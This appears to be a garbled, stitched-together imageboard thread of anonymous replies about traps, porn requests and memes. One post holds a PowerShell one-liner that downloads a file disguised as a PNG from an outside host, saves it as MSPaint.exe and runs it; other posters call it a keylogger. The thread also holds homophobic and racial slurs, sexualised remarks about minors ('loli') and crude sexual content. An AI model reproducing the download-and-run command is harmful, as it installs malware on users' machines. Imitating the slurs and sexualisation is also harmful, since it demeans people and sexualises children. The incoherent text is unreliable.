a.doko.moe/czalnu.PNG',
reddit.com/r/traps/comments/3kpehy/my_cute_gf_3/
twitter.com/AnonBabble

Ty OP ;)

Dubs!

Hail OP

That's cool, looking forward to the game. Been checking updates regularly

soooooo loli monalisa? i could go for one of those

I guess that would be the nearest equivalent. It's a shame it took people so long to devise the highest form of art.

Who is this,your ex? Hillary Clinton?

Faker

Always.

Hail OP

Dragonair, it'd be like fucking a dolphin.

Definitely take some Beedrill up the ass.

PAssword OP? Mac user

Ty OP ;)

or vaporion, that ass.

i insult people in green text because i'm cool and i don't have to green text.

Please Jane what happened? And im dying to find out what naughty things you and the other trap got up to

BENADRYL UP THE ASS

sauce on these semen demons

name of the blonde?

lol password needed not opening that shit then

its a keylogger dumbass. if you unzipped youre already fucked

Did you not read my post? I was working on no sleep and I had had a very stressful day. I know there is no excuse but I just wasn't in a good state of mind.

I heard Texas is split between conservatives and liberals, where as cali only has libs

Why are all your pics barely visible. I know you want to cover your face but please show me your body atleast.

yea, OP, you fucked up with that one LOL.

what is this, OP?

$path = $env:TEMP + '\MSPaint.exe'; (New-Object System.Net.WebClient).DownloadFile('a.doko.moe/czalnu.PNG', $path); start $path;

Why are all your pics barely visible. I know you want to cover your face but please show me your body atleast.

What's the password? It won't open

these comments are all fake. This seems sketchy as fk. not clicking that shit

that thar is a prime cut

that cosplay is so low effot. look at the fucking gun, its paper towel tubes and a vacuum hose spraypainted

Definitely gonna need more m8

No, see, you just went right on past it there, my friend. You just have to apply those brakes a couple hundred feet earlier and you'll be there.

Hey Luc.

Moar FUGGG

You the guy i fucked in the ass last night?

Is there more?

!

its a keylogger dumbasses. now someone sauce the bitches in OP's pic

reddit.com/r/traps/comments/3kpehy/my_cute_gf_3/

The highest form being?

Cute outfit. Lift it up for me please

moar

eh

Sauce?

If you insist! Hehe

Yeah haha I feel exactly like you! Glad to know someone else shares my experience! Also sadly not you... Another trap. But I still love you tons darling!!

no it deletes sys32

IT'S A FAKE SITE DO NOT OPEN
HOMOSEXUAL FAGGOT TRYING TO SCAM

F4GG0T

soooooo loli monalisa? i could go for one of those

But he's racist! Just ask a liberal!

They see me rollin

Source of pic?

It's too easy

SOMEONE SAUCE THE BITCHES IN HIS PIC
SOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PICSOMEONE SAUCE THE BITCHES IN HIS PIC

>BUT don't download pics
>malware

S-senpai! Your doubles!

Adobe Photoshop

behold

I actually forgot to check... Sorry. I don't check that email often. Obviously it's not connected to my phone or anything.

someone sauce this shit

Look at all those beautiful white people...

Faces like that remind me of what an unworthy piece of shit I am.

I guess that would be the nearest equivalent. It's a shame it took people so long to devise the highest form of art.

Would be nice if someone would post them

I don't sadly

cunt

Shitty visual novel, funny jokes though

The thing about KS memes is you don't even need to have played KS, all it takes is a simple knowledge of the 6 main characters:

The thing about KS memes is you don't even need to have played KS, all it takes is a simple knowledge of the 6 main characters:

What's the password?

what gf?

Yo who the fuck are they? I swear they look familiar

No.

blacked 6/10

Light a cigarette. Take my time doing it :^)

its my dream to be bullied by a loli some day

Hey guyz i am a hacker (called Sup Forums)

This guy is fucking with you, i know what he is doing. He is giving you a hack and then deleteing somsing from your pc.

Don't click his shit if you don't want to be RIPed

e do not forgot
we do not ecxpect
Remember us

I mean for me i just need to hear a phrase and it's meaning and I'm good to go. Sure i practice it to get it just right but that's all. My friend says he tries to think of languages as music because it's easier to memories lyrics.

Gillr

I didn't mean to put spanish twice, i ment Swedish in partial fluent. I guess i got carried away.

Keeanu Reeves once bought weed off me in a bar. This was shortly after Matrix 1 came out.

the Death Star ofc- yall loose

Top pick, event horizon is also an option.

mah nigga

Ass hurt a lot

I have over 500 pics of a chubby slut wife I have been collecting over the years. I've jacked to her more than anyone else over the years. Still get win so still laying in silence till the day I should post.

Nope

is it much of a secret if you have nudes plastered over the internet?

Whats with this shady thread, fuck off